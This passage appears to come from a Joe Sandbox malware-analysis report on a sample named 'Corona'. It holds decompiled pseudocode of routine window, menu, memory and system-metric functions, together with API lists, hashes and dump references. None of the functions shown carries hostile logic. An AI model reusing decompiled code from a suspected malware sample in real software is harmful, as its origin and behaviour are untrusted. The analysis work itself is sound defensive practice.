						_t194 =  *0x452bb4; // 0x2131320
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x452bb4; // 0x2131320
							E0041C614( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041C60C( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x452bb4; // 0x2131320
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E00446E70(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E00446148(_v8, _t122, _t199);
						E004349B8(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                  0x00446ae8
                                  0x00446ae9
                                  0x00446af0
                                  0x00446af6
                                  0x00446afd
                                  0x00446afe
                                  0x00446b03
                                  0x00446b06
                                  0x00446b0e
                                  0x00446b19
                                  0x00446b24
                                  0x00446b2a
                                  0x00446b2c
                                  0x00446b36
                                  0x00446b41
                                  0x00446b50
                                  0x00446cb2
                                  0x00446cb5
                                  0x00446cbb
                                  0x00446cbd
                                  0x00446cc4
                                  0x00446cc4
                                  0x00446ccc
                                  0x00446cd2
                                  0x00446cd4
                                  0x00446cdb
                                  0x00446cdb
                                  0x00446ce3
                                  0x00446ce9
                                  0x00446cef
                                  0x00446cf1
                                  0x00446d00
                                  0x00446d12
                                  0x00446d12
                                  0x00446d23
                                  0x00446d2a
                                  0x00446d2d
                                  0x00446d30
                                  0x00446d3d
                                  0x00446b66
                                  0x00446b70
                                  0x00446b7b
                                  0x00446b84
                                  0x00446b90
                                  0x00446bb0
                                  0x00446bb0
                                  0x00446b84
                                  0x00446bb5
                                  0x00446bc0
                                  0x00446bce
                                  0x00446bd3
                                  0x00446bd9
                                  0x00446bdb
                                  0x00446be1
                                  0x00446bea
                                  0x00446bfd
                                  0x00446c0c
                                  0x00446c2b
                                  0x00446c2b
                                  0x00446c3b
                                  0x00446c5a
                                  0x00446c5a
                                  0x00446c6a
                                  0x00446c89
                                  0x00446cac
                                  0x00446cac
                                  0x00446c6a
                                  0x00000000
                                  0x00446bdb

                                  APIs
                                  • MulDiv.KERNEL32(00000000,?,00000000), ref: 00446BA7
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 00446C23
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 00446C52
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 00446C81
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 00446CA4
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce8a226be4f6b75357d3f5ebbe0fd27d238075b0d9c4ae4a579e4e3c1a3d593c
                                  • Instruction ID: 6f69ae2b27a25fd325bd435391a4d45563639ab929921a0205d2328f21e47e78
                                  • Opcode Fuzzy Hash: ce8a226be4f6b75357d3f5ebbe0fd27d238075b0d9c4ae4a579e4e3c1a3d593c
                                  • Instruction Fuzzy Hash: A371D574B04104EFDB04DBA9C589EAAB7F5EF49304F2541F6A848EB362C739AE41DB44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448040, Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 567 448040-448062 568 4480d4-4480dc 567->568 569 448064-448071 call 44b870 567->569 571 4480e5-4480e9 568->571 572 4480de-4480e0 call 441b78 568->572 569->568 579 448073-448077 569->579 573 4480f5 571->573 574 4480eb-4480ed 571->574 572->571 577 4480f7-4480ff 573->577 574->577 578 4480ef-4480f3 574->578 580 448101-448105 call 419168 577->580 581 44810a-44810c 577->581 578->573 578->577 582 448079-44808b call 44b85c 579->582 580->581 585 448112-448116 581->585 586 4481bd-4481c6 call 435154 581->586 591 44808d-44809b call 44b85c 582->591 592 4480ce-4480d2 582->592 589 448125-44812f 585->589 590 448118-44811f 585->590 597 4481d7-4481de 586->597 598 4481c8-4481d2 call 434ef4 SetMenu 586->598 594 448131-448138 589->594 595 44813a-44813e 589->595 590->586 590->589 591->592 608 44809d-4480c9 call 40597c call 40b1f4 call 403888 591->608 592->568 592->582 594->595 599 448140-448149 call 435154 594->599 595->599 600 448198-44819f 595->600 603 4481e0-4481e4 call 449104 597->603 604 4481e9-448205 call 447f78 call 403e4c 597->604 598->597 599->597 616 44814f-44816b call 434ef4 GetMenu 599->616 600->597 606 4481a1-4481aa call 435154 600->606 603->604 606->597 618 4481ac-4481bb call 434ef4 SetMenu 606->618 608->592 629 448186-448196 call 434ef4 call 441b78 616->629 630 44816d-448181 call 434ef4 SetMenu 616->630 618->597 629->597 630->629
                                  C-Code - Quality: 89%
                                  			E00448040(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x448206);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E00441B78(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E00419168(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E00435154(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E00434EF4(_t92), 0); // executed
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E00435154(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E00434EF4(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E00435154(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E00434EF4(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E00434EF4(_t92), _t70);
								}
								E00441B78(_t113, E00434EF4(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00449104(_t92, 1);
							}
							E00447F78(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x44820d);
							return E00403E4C( &_v20);
						}
					}
				}
				_t77 =  *0x452bb4; // 0x2131320
				_t79 = E0044B870(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x452bb4; // 0x2131320
						if(_t113 ==  *((intOrPtr*)(E0044B85C(_t81, _t111) + 0x248))) {
							_t83 =  *0x452bb4; // 0x2131320
							if(_t92 != E0044B85C(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x450e20; // 0x41a65c
								E0040597C(_t87,  &_v20);
								E0040B1F4(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403888();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                  0x00448040
                                  0x00448048
                                  0x0044804b
                                  0x0044804e
                                  0x00448050
                                  0x00448054
                                  0x00448055
                                  0x0044805a
                                  0x0044805d
                                  0x00448062
                                  0x004480d4
                                  0x004480d4
                                  0x004480dc
                                  0x004480e0
                                  0x004480e0
                                  0x004480e9
                                  0x004480f5
                                  0x004480f5
                                  0x004480f7
                                  0x004480ff
                                  0x00448105
                                  0x00448105
                                  0x0044810c
                                  0x004481bf
                                  0x004481c4
                                  0x004481c6
                                  0x004481d2
                                  0x004481d2
                                  0x00000000
                                  0x00448125
                                  0x0044812f
                                  0x0044813e
                                  0x00448198
                                  0x0044819f
                                  0x004481a3
                                  0x004481a8
                                  0x004481aa
                                  0x004481b6
                                  0x004481b6
                                  0x004481aa
                                  0x00000000
                                  0x0044819f
                                  0x00000000
                                  0x00448140
                                  0x00448140
                                  0x00448149
                                  0x00448157
                                  0x0044815a
                                  0x00448164
                                  0x00448169
                                  0x0044816b
                                  0x00448175
                                  0x00448181
                                  0x00448181
                                  0x00448191
                                  0x00448191
                                  0x004481d7
                                  0x004481de
                                  0x004481e4
                                  0x004481e4
                                  0x004481eb
                                  0x004481f2
                                  0x004481f5
                                  0x004481f8
                                  0x00448205
                                  0x00448205
                                  0x0044812f
                                  0x0044810c
                                  0x00448064
                                  0x0044806e
                                  0x00448071
                                  0x00448074
                                  0x00448077
                                  0x00448079
                                  0x0044807b
                                  0x0044808b
                                  0x0044808f
                                  0x0044809b
                                  0x004480a0
                                  0x004480a3
                                  0x004480b0
                                  0x004480b5
                                  0x004480c4
                                  0x004480c9
                                  0x004480c9
                                  0x0044809b
                                  0x004480ce
                                  0x004480cf
                                  0x004480cf
                                  0x004480cf
                                  0x00448079

                                  APIs
                                  • GetMenu.USER32(00000000), ref: 00448164
                                  • SetMenu.USER32(00000000,00000000), ref: 00448181
                                  • SetMenu.USER32(00000000,00000000), ref: 004481B6
                                  • SetMenu.USER32(00000000,00000000,00000000,00448206), ref: 004481D2
                                    • Part of subcall function 0040597C: LoadStringA.USER32 ref: 004059AD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$LoadString
                                  • String ID:
                                  • API String ID: 3688185913-0
                                  • Opcode ID: 14979758ccab99fe7cabe0f5518fd9e9ec9ea6538c8f9a4fb7f28ad069071293
                                  • Instruction ID: 450757ef39f6326fd8ba85acb6853d09724175bea4c7dbb167d2a3dcea57cc38
                                  • Opcode Fuzzy Hash: 14979758ccab99fe7cabe0f5518fd9e9ec9ea6538c8f9a4fb7f28ad069071293
                                  • Instruction Fuzzy Hash: C8517D30A006455AEB21AF2A88857AF76E4AB45308F0558BFAC449B397CF7CDC498B5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044B5C4, Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E0044B5C4(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403420(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E00419098(_t63, 0);
				_t28 =  *0x450e00; // 0x4503b4
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x44b968;
				_t29 =  *0x450e0c; // 0x4503bc
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x44b974;
				E0044B980(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E004030CC(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E004030CC(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E004030CC(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E004030CC(1);
				_t42 = E004030CC(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L0040638C();
				_t75 = _t42;
				L004060D4();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L004065C4();
				_t11 = _t62 + 0x58; // 0x4449c06e
				_t45 =  *0x450f4c; // 0x452914
				 *((intOrPtr*)( *_t45))(0, 0, E00447D9C,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E0041C258(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E0041C258(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E0041C258(1);
				E0044BDA0(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x44bc7c;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x44bc7c;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x44bc7c;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403478(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























                                  0x0044b5c4
                                  0x0044b5c4
                                  0x0044b5cc
                                  0x0044b5ce
                                  0x0044b5d1
                                  0x0044b5d1
                                  0x0044b5d6
                                  0x0044b5d9
                                  0x0044b5df
                                  0x0044b5e4
                                  0x0044b5e9
                                  0x0044b5ec
                                  0x0044b5f2
                                  0x0044b5f7
                                  0x0044b5fa
                                  0x0044b602
                                  0x0044b60e
                                  0x0044b61d
                                  0x0044b62c
                                  0x0044b63b
                                  0x0044b64a
                                  0x0044b654
                                  0x0044b659
                                  0x0044b65e
                                  0x0044b663
                                  0x0044b668
                                  0x0044b66d
                                  0x0044b673
                                  0x0044b678
                                  0x0044b686
                                  0x0044b68d
                                  0x0044b69b
                                  0x0044b6ad
                                  0x0044b6bf
                                  0x0044b6c7
                                  0x0044b6cc
                                  0x0044b6cc
                                  0x0044b6d2
                                  0x0044b6d5
                                  0x0044b6dc
                                  0x0044b6dc
                                  0x0044b6e2
                                  0x0044b6e5
                                  0x0044b6ec
                                  0x0044b6ec
                                  0x0044b6f2
                                  0x0044b6f5
                                  0x0044b6fc
                                  0x0044b702
                                  0x0044b704
                                  0x0044b709
                                  0x0044b710
                                  0x0044b719

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 0044B609
                                  • 72E7AC50.USER32(00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044B65E
                                  • 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044B668
                                  • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000), ref: 0044B673
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B380KeyboardLayout
                                  • String ID:
                                  • API String ID: 648844651-0
                                  • Opcode ID: a576d15c947695cdac0e20eec7c8d8843eee132a0ed68865e841ecc91e28d983
                                  • Instruction ID: d2a040ce9e9bc98946259e3464b4bf6165b8ec6f67b0d5e6841ffa5a462a6c8d
                                  • Opcode Fuzzy Hash: a576d15c947695cdac0e20eec7c8d8843eee132a0ed68865e841ecc91e28d983
                                  • Instruction Fuzzy Hash: 1B3117B06112059FE740EF29C8C2B997BE4FB05318F0491BAED08DF766DB7AD8048B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044CC30, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 669 44cc30-44cc40 670 44cc46-44cc4d 669->670 671 44ccda-44ccde 669->671 672 44ccd4 670->672 673 44cc53-44cc74 EnumWindows 670->673 672->671 673->672 674 44cc76-44cc91 GetWindow GetWindowLongA 673->674 675 44cc93 674->675 676 44cc9a-44cca7 674->676 675->676 676->672 677 44cca9-44ccd2 call 4136f8 SetWindowPos 676->677 677->672
                                  C-Code - Quality: 100%
                                  			E0044CC30(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x452bb0; // 0x2131714
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E0044CBC0, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E004136F8( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                  0x0044cc32
                                  0x0044cc35
                                  0x0044cc37
                                  0x0044cc40
                                  0x0044cc4d
                                  0x0044cc56
                                  0x0044cc59
                                  0x0044cc65
                                  0x0044cc6a
                                  0x0044cc6a
                                  0x0044cc74
                                  0x0044cc82
                                  0x0044cc84
                                  0x0044cc91
                                  0x0044cc93
                                  0x0044cc93
                                  0x0044cc9a
                                  0x0044cc9a
                                  0x0044cca3
                                  0x0044cca7
                                  0x0044cca9
                                  0x0044ccbd
                                  0x0044ccc9
                                  0x0044ccce
                                  0x0044cccf
                                  0x0044cca9
                                  0x0044cca7
                                  0x0044cc74
                                  0x0044ccd4
                                  0x0044ccd4
                                  0x0044ccde

                                  APIs
                                  • EnumWindows.USER32(0044CBC0), ref: 0044CC65
                                  • GetWindow.USER32(00000003,00000003), ref: 0044CC7D
                                  • GetWindowLongA.USER32 ref: 0044CC8A
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 0044CCC9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$EnumLongWindows
                                  • String ID:
                                  • API String ID: 4191631535-0
                                  • Opcode ID: ec7f48961f8dc0b696fa70ad36ec99b7a711554e43efa4f1528b16ea64c98eb6
                                  • Instruction ID: b21136fbe1e1a7ef4efa8573b02bae43e2fff50cc6aa42108ab334e903ddf784
                                  • Opcode Fuzzy Hash: ec7f48961f8dc0b696fa70ad36ec99b7a711554e43efa4f1528b16ea64c98eb6
                                  • Instruction Fuzzy Hash: 0F11A030645210AFEB50EF28CCC6F9673E8EB04324F19017AF958AB2D2C3789C40C759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004019FC, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 680 4019fc-401a1e RtlInitializeCriticalSection 681 401a20-401a25 RtlEnterCriticalSection 680->681 682 401a2a-401a60 call 4013c0 * 3 LocalAlloc 680->682 681->682 689 401a91-401aa5 682->689 690 401a62 682->690 694 401ab1 689->694 695 401aa7-401aac RtlLeaveCriticalSection 689->695 691 401a67-401a79 690->691 691->691 693 401a7b-401a8a 691->693 693->689 695->694
                                  C-Code - Quality: 68%
                                  			E004019FC() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401AB2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4525c8);
				L00401350();
				if( *0x452049 != 0) {
					_push(0x4525c8);
					L00401358();
				}
				E004013C0(0x4525e8);
				E004013C0(0x4525f8);
				E004013C0(0x452624);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x452620 = _t11;
				if( *0x452620 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x452620; // 0x5bca20
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x45260c)) = 0x452608;
					 *0x452608 = 0x452608;
					 *0x452614 = 0x452608;
					 *0x4525c0 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401AB9);
				if( *0x452049 != 0) {
					_push(0x4525c8);
					L00401360();
					return 0;
				}
				return 0;
			}








                                  0x00401a01
                                  0x00401a02
                                  0x00401a07
                                  0x00401a0a
                                  0x00401a0d
                                  0x00401a12
                                  0x00401a1e
                                  0x00401a20
                                  0x00401a25
                                  0x00401a25
                                  0x00401a2f
                                  0x00401a39
                                  0x00401a43
                                  0x00401a4f
                                  0x00401a54
                                  0x00401a60
                                  0x00401a62
                                  0x00401a67
                                  0x00401a67
                                  0x00401a6f
                                  0x00401a73
                                  0x00401a74
                                  0x00401a80
                                  0x00401a83
                                  0x00401a85
                                  0x00401a8a
                                  0x00401a8a
                                  0x00401a93
                                  0x00401a96
                                  0x00401a99
                                  0x00401aa5
                                  0x00401aa7
                                  0x00401aac
                                  0x00000000
                                  0x00401aac
                                  0x00401ab1

                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A12
                                  • RtlEnterCriticalSection.KERNEL32(004525C8,004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A25
                                  • LocalAlloc.KERNEL32(00000000,00000FF8,004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A4F
                                  • RtlLeaveCriticalSection.KERNEL32(004525C8,00401AB9,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401AAC
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                  • String ID:
                                  • API String ID: 730355536-0
                                  • Opcode ID: 8d992bab54b366bbb3409039714fe17a846d884973171b375183100eae1a298f
                                  • Instruction ID: fa7dc51d4ec23576ec219d98cd212589ff5ce460954400c3ce56b976cac73690
                                  • Opcode Fuzzy Hash: 8d992bab54b366bbb3409039714fe17a846d884973171b375183100eae1a298f
                                  • Instruction Fuzzy Hash: 5501D6703457846EE31AAB699A167193AC0E74B706F40847BF801B6AF3E7FC8444CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00423864, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00423864(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x452920 == 0) {
					 *0x4528f8 = E0042377C(0, _t8,  *0x4528f8, _t17, _t18);
					_t7 =  *0x4528f8(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                  0x00423868
                                  0x00423872
                                  0x00423886
                                  0x0042388c
                                  0x00000000
                                  0x0042388c
                                  0x00423894
                                  0x0042389c
                                  0x0042389c
                                  0x0042389f
                                  0x004238b3
                                  0x004238a1
                                  0x004238a1
                                  0x004238b7
                                  0x004238a3
                                  0x004238a3
                                  0x004238a3
                                  0x004238a4
                                  0x004238bb
                                  0x004238a6
                                  0x004238a7
                                  0x004238aa
                                  0x004238ac
                                  0x004238ac
                                  0x004238aa
                                  0x004238a4
                                  0x004238a1
                                  0x004238c0
                                  0x004238c3
                                  0x004238cd
                                  0x004238c5
                                  0x00000000
                                  0x004238c6

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 004238C6
